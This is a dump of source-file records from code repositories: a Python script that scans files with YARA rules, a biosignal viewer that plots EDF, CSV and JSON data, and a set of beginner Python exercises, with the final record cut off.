[ { "alpha_fraction": 0.5283939838409424, "alphanum_fraction": 0.5297249555587769, "avg_line_length": 30.746479034423828, "blob_id": "e64c769cbcab7eee72d08971ed8cc56184720307", "content_id": "f8072cb634668d43140ccab85d149aa6fa95624f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2254, "license_type": "permissive", "max_line_length": 113, "num_lines": 71, "path": "/yara_scan.py", "repo_name": "Trietptm-on-Security/yara_scan", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport sys\nimport argparse\nimport yara\n# yara_scan\n# usage: python yara_scan.py -y <yara_rule_dir> [-s <scan_files_dir> (optional otherwise current dir is scanned)]\n\n__author__ = \"Tyler Halfpop\"\n__version__ = \"0.2\"\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(usage=\"Scan Files in a Directory with Yara Rules\")\n parser.add_argument('-y', '--yara_dir',\n action='store',\n help='Path to Yara rules directory')\n\n parser.add_argument('-s', '--scan_dir',\n action='store',\n default=os.getcwd(),\n help='Path to the directory of files to scan')\n\n return parser\n\nclass YaraClass:\n def __init__(self, arg_yara_dir, arg_scan_dir):\n try:\n self.scan_dir = arg_scan_dir\n self.yara_dir = arg_yara_dir\n except Exception as e:\n print \"Init Exception: {}\".format(e)\n\n def compile(self):\n try:\n all_rules = {}\n for root, directories, files in os.walk(self.yara_dir):\n for file in files:\n if \"yar\" in os.path.splitext(file)[1]:\n rule_case = os.path.join(root,file) \n if self.test_rule(rule_case):\n all_rules[file] = rule_case\n self.rules = yara.compile(filepaths=all_rules)\n except Exception as e:\n print \"Compile Exception: {}\".format(e)\n\n def test_rule(self, test_case):\n try:\n testit = yara.compile(filepath=test_case)\n return True\n except:\n print \"{} is an invalid rule\".format(test_case)\n return False\n\n def scan(self):\n try:\n for root, directories, files in os.walk(self.scan_dir):\n for file in files:\n matches = self.rules.match(os.path.join(root,file))\n print \"{}\\n{}\\n\".format(file, matches)\n except Exception as e:\n print \"Scan Exception: {}\".format(e)\n\ndef main():\n args = parse_arguments().parse_args()\n\n ys = YaraClass(args.yara_dir, args.scan_dir) \n ys.compile()\n ys.scan()\n\nif __name__ == \"__main__\":\n main()\n" } ]
1
adel-elmala/SigView
https://github.com/adel-elmala/SigView
6c256144ebd6be5a20e118f4c6c68d686f500abe
5f58e45b54f7edfeb835043b006ace9e73c1d4d3
3e996f1b2ce3b1030614445a0dbcc0e591cfbacf
refs/heads/master
2022-04-08T13:45:03.792200
2020-02-20T18:04:47
2020-02-20T18:04:47
240,602,063
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5362087488174438, "alphanum_fraction": 0.5857294797897339, "avg_line_length": 22.424999237060547, "blob_id": "d7dd5c98d8e8b3d7d9a814274079f7ea3be35ebf", "content_id": "851278f1edb05ebc0c3db8f328c9c2b27df22f83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1878, "license_type": "no_license", "max_line_length": 56, "num_lines": 80, "path": "/main.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 20:54:30 2020\n\n@author: adel\nDriver program\n\"\"\"\nimport identify\nimport matplotlib.pyplot as plt\n#get file name\njsonfile = \"ecgjson.json\"\ncsvfile = \"arrhythmia_csv.csv\"\nedffile = \"Normal_Subject_01.edf\"\n\nfileName , fileExtension = identify.identFile(jsonfile)\n\ndef redirectPlot(fileExtension):\n if fileExtension.lower() == '.json':\n plotJson(identify.redirect(jsonfile))\n elif fileExtension.lower() == '.edf':\n plotEdf(identify.redirect(edffile)) \n elif fileExtension.lower() == '.csv': \n plotCsv(identify.redirect(csvfile))\n else:\n raise ValueError(\"File Extension Not Supported\")\n \ndef plotJson(tuple):\n mypanda,time,ecg = tuple\n fig , ax = plt.subplots()\n ax.plot(mypanda[:500])\n \ndef plotEdf(tuple):\n #plotting 5 channels \n fig,ax=plt.subplots(5,1)\n ch1,ch2,ch3,ch4,ch5,name = tuple\n \n x0 =len(ch1) \n x1 =len(ch2) \n x2 =len(ch3)\n x3 =len(ch4)\n x4 =len(ch5)\n ax[0].plot(ch1.iloc[1:x0,],color = 'r')\n ax[1].plot(ch2.iloc[1:x1,])\n ax[2].plot(ch3.iloc[1:x2,])\n ax[3].plot(ch4.iloc[1:x3,])\n ax[4].plot(ch5.iloc[1:x4,])\n plt.xlabel('time (s)')\n ax[0].set_ylabel(name[0])\n ax[1].set_ylabel(name[1])\n ax[2].set_ylabel(name[2])\n ax[3].set_ylabel(name[3])\n ax[4].set_ylabel(name[14])\n plt.legend(loc='best')\n plt.show()\n \n # def zoomIn():\n # x0 /= 2\n # x1 /= 2\n # x2 /= 2\n # x3 /= 2\n # x4 /= 2\n \n #zoomIn()\n #plotEdf(tuple)\n #plt.show()\n \ndef plotCsv(tuple):\n csvpanda = tuple \n fig,(ax1,ax2) = plt.subplots(2,sharey=True)\n ax1.plot(csvpanda[0:200])\n ax2.plot(csvpanda[125:150]) #zoomed \n plt.show() #Display the plot\n \n\n\n#tests \nredirectPlot('.edf')\nredirectPlot('.csv')\nredirectPlot('.json')\n " }, { "alpha_fraction": 0.6677042841911316, "alphanum_fraction": 0.6961089372634888, "avg_line_length": 45.70909118652344, "blob_id": "21c48387a716b094572ca64dbf422208c5520447", "content_id": "da7c3a67300a6858e501a55584ee10b4b01f6011", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2570, "license_type": "no_license", "max_line_length": 73, "num_lines": 55, "path": "/design.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'design.ui'\n#\n# Created by: PyQt5 UI code generator 5.10.1\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom pyqtgraph import PlotWidget\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(487, 389)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.Openfile = QtWidgets.QPushButton(self.centralwidget)\n self.Openfile.setGeometry(QtCore.QRect(20, 10, 81, 51))\n self.Openfile.setObjectName(\"Openfile\")\n self.plotWindow = PlotWidget(self.centralwidget)\n self.plotWindow.setGeometry(QtCore.QRect(5, 71, 481, 281))\n self.plotWindow.setObjectName(\"plotWindow\")\n self.Play = QtWidgets.QPushButton(self.centralwidget)\n self.Play.setGeometry(QtCore.QRect(110, 10, 71, 51))\n self.Play.setObjectName(\"Play\")\n self.Stop = QtWidgets.QPushButton(self.centralwidget)\n self.Stop.setGeometry(QtCore.QRect(190, 10, 71, 51))\n self.Stop.setObjectName(\"Stop\")\n self.Zoomin = QtWidgets.QPushButton(self.centralwidget)\n self.Zoomin.setGeometry(QtCore.QRect(270, 10, 71, 51))\n self.Zoomin.setObjectName(\"Zoomin\")\n self.Zoomout = QtWidgets.QPushButton(self.centralwidget)\n self.Zoomout.setGeometry(QtCore.QRect(350, 10, 71, 51))\n self.Zoomout.setObjectName(\"Zoomout\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 487, 22))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.Openfile.setText(_translate(\"MainWindow\", \"openfile\"))\n self.Play.setText(_translate(\"MainWindow\", \"play\"))\n self.Stop.setText(_translate(\"MainWindow\", \"stop\"))\n self.Zoomin.setText(_translate(\"MainWindow\", \"zoom in\"))\n self.Zoomout.setText(_translate(\"MainWindow\", \"zoom out\"))\n\n" }, { "alpha_fraction": 0.6423760056495667, "alphanum_fraction": 0.684629499912262, "avg_line_length": 28.160715103149414, "blob_id": "8f7f8264fdcc755b7649ccb52f3596b56922e6a3", "content_id": "37e00c2f5d48a60581c1c4f6e3e2c1c968878b9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1633, "license_type": "no_license", "max_line_length": 106, "num_lines": 56, "path": "/edfFuncs.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 17:12:28 2020\n\n@author: adel\n\nREAD EDF FILE AND RETURN 5 channels DataFrame + chs_names (all in tuple)\n\"\"\"\n#%matplotlib inline\n#import matplotlib.pyplot as plt\n#import plotly.plotly as py\n#import numpy as np\nimport mne\nimport pandas as pd\n#from plotly import tools\n#from plotly.graph_objs import Layout, YAxis, Scatter, Annotation, Annotations, Data, Figure, Marker, Font\n#plt.ion()\n\nedffilename = \"Normal_Subject_01.edf\"\ndef ReadEdf(edffilename):\n mne.set_log_level(\"WARNING\")\n raw = mne.io.read_raw_edf(edffilename, preload=False)\n #raw.plot()\n start, stop = raw.time_as_index([100, 115]) # 100 s to 115 s data segment\n \n picks = mne.pick_types(raw.info,include=(raw.ch_names))\n n_channels = len(raw.ch_names)\n data, times = raw[picks[:n_channels], start:stop]\n ch_names = [raw.info['ch_names'][p] for p in picks[:n_channels]]\n edfPanda1 = pd.DataFrame(data[0],times)\n edfPanda2 = pd.DataFrame(data[1],times)\n edfPanda3 = pd.DataFrame(data[2],times)\n edfPanda4 = pd.DataFrame(data[3],times)\n edfPanda5 = pd.DataFrame(data[14],times)\n return(edfPanda1,edfPanda2,edfPanda3,edfPanda4,edfPanda5,ch_names)\n#print(data.shape)\n#print(times.shape)\n#print(times.min(), times.max())\n#print(picks)\n\n#plt.plot(times[1:55], data.T[1:55])\n\n\n#plotting 5 channels \n#fig,ax=plt.subplots(5,1)\n#ch1,ch2,ch3,ch4,ch5,name = ReadEdf(edffilename)\n#ax[0].plot(ch1,color = 'r')\n#ax[1].plot(ch2)\n#ax[2].plot(ch3)\n#ax[3].plot(ch4)\n#ax[4].plot(ch5)\n#plt.xlabel('time (s)')\n#plt.ylabel('MEG data (T)')\n#plt.legend(loc='best')\n#plt.show()\n" }, { "alpha_fraction": 0.6208742260932922, "alphanum_fraction": 0.635147213935852, "avg_line_length": 23.288888931274414, "blob_id": "6a8b0027cb23d82cc17c8cac58ffbea8fb7992c3", "content_id": "b628801da48a7e63cf35e5b0d4df90632fe7bdf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1121, "license_type": "no_license", "max_line_length": 57, "num_lines": 45, "path": "/identify.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 17:12:24 2020\n\n@author: adel\n\n\nidentify the file extension\n\"\"\"\nimport jsonFuncs\nimport csvFuncs\nimport edfFuncs\nimport os\n\n#make a function t retrive filename from GUI\njsonfile = \"ecgjson.json\"\ncsvfile = \"arrhythmia_csv.csv\"\nedffile = \"Normal_Subject_01.edf\"\n#extracting the file name & extension\ndef identFile(filename):\n filename, file_extension = os.path.splitext(filename)\n return (filename, file_extension)\n \n#name , exten = identFile(file) \n#redirecting to it's opening func\n\ndef redirect(filename):\n name , extension = identFile(filename)\n if extension.lower() == '.json':\n print('JSON READ')\n return jsonFuncs.ReadJson(filename)\n \n elif extension.lower() == '.csv':\n #readCsv(file)\n print('CSV READ')\n return csvFuncs.ReadCsv(filename)\n \n elif extension.lower() == '.edf':\n #readEdf(file)\n print('EDF READ')\n return edfFuncs.ReadEdf(filename)\n \n else:\n raise NameError('File Extension not supported')\n\n\n \n \n " }, { "alpha_fraction": 0.5909990072250366, "alphanum_fraction": 0.6003956198692322, "avg_line_length": 26.91428565979004, "blob_id": "634685f7f354ed642d83b152aba258721d733ede", "content_id": "83e4c3a410d0bf6f9754e405215c5f03a9eca5ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2022, "license_type": "no_license", "max_line_length": 72, "num_lines": 70, "path": "/starter_file.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "from PyQt5 import QtWidgets, QtCore\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nfrom design import Ui_MainWindow\r\nimport sys\r\nimport pyqtgraph as pg\r\nimport sys\r\nimport numpy as np\r\n\r\n\r\nclass ApplicationWindow(QtWidgets.QMainWindow):\r\n signal = list()\r\n cur = 0\r\n flag = 1\r\n ran = 50\r\n def __init__(self):\r\n super(ApplicationWindow, self).__init__()\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n \r\n self.timer = QtCore.QTimer()\r\n self.timer.setInterval(10)\r\n self.timer.timeout.connect(self.pan)\r\n self.timer.start()\r\n \r\n \r\n \r\n def open_dialog_box(self):\r\n print(\"heelll\")\r\n filename = QFileDialog.getOpenFileName()\r\n path = filename[0]\r\n signal = np.genfromtxt(path , delimiter=',')\r\n self.ui.plotWindow.plot(list(range(len(signal))), signal)\r\n self.ui.plotWindow.setXRange(self.cur, self.cur + self.ran)\r\n \r\n \r\n def pan(self):\r\n if not self.flag:\r\n self.ui.plotWindow.setXRange(self.cur, self.cur + self.ran)\r\n self.cur = self.cur + 0.1\r\n \r\n def play(self):\r\n self.flag = 0\r\n \r\n def pause(self):\r\n self.flag = 1\r\n \r\n def zoomin(self):\r\n self.ran = max(5, self.ran - 5)\r\n self.ui.plotWindow.setXRange(self.cur, self.cur + self.ran)\r\n \r\n def zoomout(self):\r\n self.ran = min(100, self.ran + 5)\r\n self.ui.plotWindow.setXRange(self.cur, self.cur + self.ran)\r\n \r\n \r\n\r\ndef main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n application = ApplicationWindow()\r\n application.ui.Play.clicked.connect(application.play)\r\n application.ui.Stop.clicked.connect(application.pause)\r\n application.ui.Openfile.clicked.connect(application.open_dialog_box)\r\n application.ui.Zoomin.clicked.connect(application.zoomin)\r\n application.ui.Zoomout.clicked.connect(application.zoomout)\r\n application.show()\r\n app.exec_()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()" }, { "alpha_fraction": 0.6347699165344238, "alphanum_fraction": 0.6493791341781616, "avg_line_length": 24.27777862548828, "blob_id": "257262477b208a2c5298edb063eaec752a30db88", "content_id": "75468576942510a7eb5296c4568726d7ba335c9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1369, "license_type": "no_license", "max_line_length": 88, "num_lines": 54, "path": "/jsonFuncs.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 09:52:57 2020\n\n@author: adel\n\nplotting JSON files\nreads the json file & proccess it\n& returns a panda(dataframe) of time and ecg readings\n\"\"\"\n#import identify\n\n\nimport pandas as pd\n#from pandas.io.json import json_normalize\nimport json\nimport codecs\n#import matplotlib.pyplot as plt\n\n#name1 ,exten1 = identify.identFile('hola.json')\n\njsonfilename = 'ecgjson.json'\n\n#reads the json file & proccess it & returns a panda(dataframe) of time and ecg readings\ndef ReadJson(jsonfilename):\n data = json.load(codecs.open(jsonfilename, 'r', 'utf-8-sig'))\n dataframe = pd.DataFrame.from_dict(data)\n ecg_dict = dataframe['ecg']['ECG']\n \n ecg_time_list =[]\n ecg_vals_list =[]\n\n for item in ecg_dict:\n ecg_time_list.append(list(item.keys()))\n ecg_vals_list.append(list(item.values()))\n\n flat_time_list = []\n flat_ecg_list = []\n\n def flatten(l,fl):\n for sublist in l:\n for item in sublist:\n fl.append(item) \n \n flatten(ecg_time_list,flat_time_list)\n flatten(ecg_vals_list,flat_ecg_list) \n jsonPanda = pd.DataFrame(flat_ecg_list,flat_time_list)\n \n return (jsonPanda,flat_time_list,flat_ecg_list)\n#mypanda,time,ecg = ReadJson(jsonfilename)\n \n#fig , ax = plt.subplots()\n#ax.plot(mypanda[:500])\n " }, { "alpha_fraction": 0.6133333444595337, "alphanum_fraction": 0.6836363673210144, "avg_line_length": 17.75, "blob_id": "0f0afbb3b739588594dd4a5680eb6935be479ed7", "content_id": "66e1b98e0596a0f11101b3106757a3b491d8f995", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 825, "license_type": "no_license", "max_line_length": 45, "num_lines": 44, "path": "/csvFuncs.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 13 22:21:20 2020\n\n@author: adel\n\nplotting CSV files\n\n\"\"\"\n\n#1 - identifiy file extension DONE\n#2 - read the file and proccess it \n#3 - plot the data\n#4 - \nimport pandas as pd\n#import matplotlib.pyplot as plt\n\ncsvfilename = \"arrhythmia_csv.csv\"\n\ndef ReadCsv(csvfilename):\n dataset = pd.read_csv(csvfilename)\n return dataset[\"heartrate\"]\n \n\n#csvpanda = ReadCsv(csvfilename)\n\n\n\n#ax1.set_title(\"ZOOM\") #The title of our plot\n#plt.xticks(range(0, 100,5))\n#ax2.set_xlabel(\"Heart Rate Signal\") \n#ax1.plot(dataset[50:350])\n#ax2.plot(dataset[x:y]) #Draw the plot object\n#ax1.yticks(range(0,105,25))\n\n#x=0\n#y=600\n\n\n#fig,(ax1,ax2) = plt.subplots(2,sharey=True)\n#ax1.plot(csvpanda[0:200])\n#ax2.plot(csvpanda[125:150]) #zoomed \n#plt.show() #Display the plot\n" } ]
7
rohithbt/python_rohit89
https://github.com/rohithbt/python_rohit89
16514486e95f3356caecdf5331ba5e086dc3bb77
c4ea7c0fa3100d0b5996de339b2774fd03e2db63
94cb1bc3978084146fcc393f2ade26c5d3fa7eee
refs/heads/master
2022-08-01T06:50:53.897865
2020-05-28T05:45:13
2020-05-28T05:45:13
264,086,308
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6600000262260437, "avg_line_length": 9.199999809265137, "blob_id": "b42d91722d479ce9dd471cc140c77f715c47f88a", "content_id": "570f434639dc37a27ac53b81e458eadc054e22b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 50, "license_type": "no_license", "max_line_length": 14, "num_lines": 5, "path": "/logical.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=5\nb=10\nprint(a and b)\nprint(a or b)\nprint(not a)" }, { "alpha_fraction": 0.6022727489471436, "alphanum_fraction": 0.6136363744735718, "avg_line_length": 21, "blob_id": "e2e535a3d1da60db075ee96d65c7feb90cc1a5ff", "content_id": "57fbea64ba86d2b8d4603d0073216e9bfbd8fde5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/replacestring.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "str=\"rohith\"\nprint(str.replace('r','--R--',1))\nprint(str.upper())\nprint(str.index('i'))\n" }, { "alpha_fraction": 0.59375, "alphanum_fraction": 0.65625, "avg_line_length": 15.5, "blob_id": "7c5d309a275e5595f64788313fd8cb4a38c75d86", "content_id": "0e522d39547976ef72038ce582c417cf0ca88297", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32, "license_type": "no_license", "max_line_length": 18, "num_lines": 2, "path": "/lambda.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "ans=(lambda z:z*4)\nprint(ans(7))" }, { "alpha_fraction": 0.4935064911842346, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 10.142857551574707, "blob_id": "c7484c50d6d28778342ae8414ccd79f936dd8510", "content_id": "bd2e6e0981b9327252f1dee36730fcff0bc0c24f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 77, "license_type": "no_license", "max_line_length": 16, "num_lines": 7, "path": "/functionexample1.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "def add(a,b):\n sum=a+b\n\n return(sum)\n\nprint (add(1,3))\nprint (add(2,4))" }, { "alpha_fraction": 0.6637930870056152, "alphanum_fraction": 0.6637930870056152, "avg_line_length": 15.714285850524902, "blob_id": "4daa4c8136f2bdd78917d37d3d42122c99b22cff", "content_id": "4bec4eba8037ff0918abd7cea3120bf96512bd5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 34, "num_lines": 7, "path": "/function2.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "def print_name(str):\n print(\"welocme to python\",str)\n return()\n\n\nstr=input(\"enter your name:\")\nprint_name(str)" }, { "alpha_fraction": 0.5785123705863953, "alphanum_fraction": 0.64462810754776, "avg_line_length": 14.25, "blob_id": "722c07112e29db3f333aea9b504076294273713a", "content_id": "3d61afb9717dd4edc5b1aea66f934c49fae2f575", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 121, "license_type": "no_license", "max_line_length": 29, "num_lines": 8, "path": "/converttuple.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "tuple=(1,2,3,4,5,'a','b','c')\nlst=list(tuple)\nprint(tuple)\n\nlst[1]='python'\nprint(lst)\n#$tuple2=tuple(lst)\n#print(tuple2)" }, { "alpha_fraction": 0.4904458522796631, "alphanum_fraction": 0.5923566818237305, "avg_line_length": 14.800000190734863, "blob_id": "eed31fbe7e6df6776047e78b57fd97af8b806da1", "content_id": "c13b2185aaa0a1a6b4077235ae4fb144be343037", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 38, "num_lines": 10, "path": "/tup_operator.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "tup=('home','quarantine','corona','2')\nprint(len(tup))\nprint(max(tup))\nprint(min(tup))\n\n\n\ntup1=([0,1,2],[1,2,3],[3,4,5,6])\ntup1[0][0] = 'updated'\nprint(tup1)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 5.375, "blob_id": "9510e7f6119eb59bfeb87a5329c9a3d0a72287b2", "content_id": "3b09fb1dfa7c59e20d2d21d98d43ee4dfa4ab4ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 50, "license_type": "no_license", "max_line_length": 16, "num_lines": 8, "path": "/dir.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import math\n\na = 1\nb =[]\n\nc=2311\n\nprint(dir(math))" }, { "alpha_fraction": 0.6321243643760681, "alphanum_fraction": 0.6787564754486084, "avg_line_length": 21.764705657958984, "blob_id": "2e310f21c9d73fec3a574c415fd1e012515e7aa7", "content_id": "844fedccf362610d8c1fb8d0d17b220440c35042", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 386, "license_type": "no_license", "max_line_length": 94, "num_lines": 17, "path": "/list.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "A=[]\nA=[1,2,3,4]\nprint(A)\nprint(A[1])\nprint(A[3]) \nA[1] = \"u can change the list element\"\nprint(A[1])\n\n\nB=[[1,2,3], 4 ,'third element',(1,2,3,4)] #A list can contain a list inside as well as a tuple\nprint(B)\nprint(B[3][3])\n\n#lists are enclosed with brackets[] and tuples with paranthesis()\n#lists are mutable(cant change)\n#tuples are immutable(can change)\n#tuples are faster than lists" }, { "alpha_fraction": 0.7002881765365601, "alphanum_fraction": 0.7089337110519409, "avg_line_length": 27.91666603088379, "blob_id": "69568f4e12c8a8ca82c29bae0b27ab16b633bd9e", "content_id": "ce311a2cf4fb7a942ff06050b8cf3b71592821cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 347, "license_type": "no_license", "max_line_length": 60, "num_lines": 12, "path": "/operation_file.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import os\nnewfile=open(\"kor.txt\",\"w+\") #write the file\n#newfile.close()\nprint(newfile.mode) #it will display the mode of file\nprint(newfile.name)\n#print(newfile.softspace)\n\n#for i in range(0,10):\n# newfile.write(\"\\n Hello,Welcome to python\")\n\n#os.rename(\"kora.txt\",\"ro.txt\") #this is for renaming a file\n#os.remove(\"ro.txt\") to remove the file " }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.5128205418586731, "avg_line_length": 12, "blob_id": "2b7aabe3cf1bb47f02ed94c9d2f2adea213b17b7", "content_id": "b4e0776b494977ecb731bc5f62613e3c2d03d8b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "no_license", "max_line_length": 30, "num_lines": 9, "path": "/global1.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=30\ndef add(b):\n c=30\n print(\"c=\",c)\n print(c)\n sum=b+c\n print(\"addition is:\",sum )\nprint(a)\nadd(40)\n" }, { "alpha_fraction": 0.4346405267715454, "alphanum_fraction": 0.4869281053543091, "avg_line_length": 11.791666984558105, "blob_id": "a950e39a1fbdd9f7b879b14c7e91fb389c5daa04", "content_id": "524a5ca9abc611078fbf11def3b03f2161e98379", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 306, "license_type": "no_license", "max_line_length": 32, "num_lines": 24, "path": "/nestedfor.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "count=1\nfor i in range(10):\n print(str(i)*i)\n for j in range(0,i):\n count=count+1\n\n\n#while day == 'thursday':\n# for i in [1,2,3,4]:\n# print ('something')\n\n\n\nfor i in [1,2,3]:\n pass\n\nprint('A')\n\n\nfor i in range(1,11):\n if i ==5:\n break\n #continue\n print (i)" }, { "alpha_fraction": 0.772946834564209, "alphanum_fraction": 0.782608687877655, "avg_line_length": 24.875, "blob_id": "f8362b250488c1a7ecbe73ea2c5d00835e72abb4", "content_id": "a708dc5f0aa4cc71a180eb6732009dcc99d355b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 41, "num_lines": 8, "path": "/enumerate.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "grocery = ['bread','butter','jam']\nenumerateGrocery= enumerate (grocery)\n\nprint(type(enumerateGrocery))\nprint(list(enumerateGrocery))\n\nenumerateGrocery= enumerate (grocery, 10)\nprint(list(enumerateGrocery))\n" }, { "alpha_fraction": 0.8500000238418579, "alphanum_fraction": 0.8500000238418579, "avg_line_length": 12.666666984558105, "blob_id": "74b034ec446a2d14690ab83cf9cb52423cfc0be1", "content_id": "9b60d105d0de4e2d346e648c8ef1730a053f09ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40, "license_type": "no_license", "max_line_length": 23, "num_lines": 3, "path": "/datetime.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import datetime\n\nprint(datetime.MAXYEAR)" }, { "alpha_fraction": 0.6913580298423767, "alphanum_fraction": 0.7530864477157593, "avg_line_length": 19.5, "blob_id": "a05b717e2aee1d6d99ea1ad20b83e319cc88e3ba", "content_id": "a0baa8b855ee5de168b1dced2cc623fa1ac0b0fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 81, "license_type": "no_license", "max_line_length": 28, "num_lines": 4, "path": "/random.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import random\nnum = random.randrange(100)\nprint(num)\nprint (random.randint(0, 5))" }, { "alpha_fraction": 0.7628865838050842, "alphanum_fraction": 0.7628865838050842, "avg_line_length": 15.333333015441895, "blob_id": "5222306ff90d6b918b932616ef134da1f897f7bf", "content_id": "2696d6df0ece972cb81ec474e62c29694621a833", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 97, "license_type": "no_license", "max_line_length": 17, "num_lines": 6, "path": "/sys1.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import sys\nprint(sys.argv)\nprint(sys.exit())\nprint(sys.winver)\nprint(sys.flags)\nprint(sys.prefix)" }, { "alpha_fraction": 0.4404761791229248, "alphanum_fraction": 0.4761904776096344, "avg_line_length": 10.714285850524902, "blob_id": "6347ac2a6beba30d19172d2cc1ffee1b226df504", "content_id": "1719e2dc21667ecf26a8ea1a668bd6d304d5f11d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 15, "num_lines": 7, "path": "/bitwise.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=5\nb=10\nprint( a & b)\nprint( a | b)\nprint( a ^ b)\nprint( a << b)\nprint( a >> b)\n\n\n" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 7.5, "blob_id": "83cd1c55a5c61cadd658a3be395bcf859caedb3f", "content_id": "a7c6a60612426bbd21f0570231096c2f0a072dd4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 50, 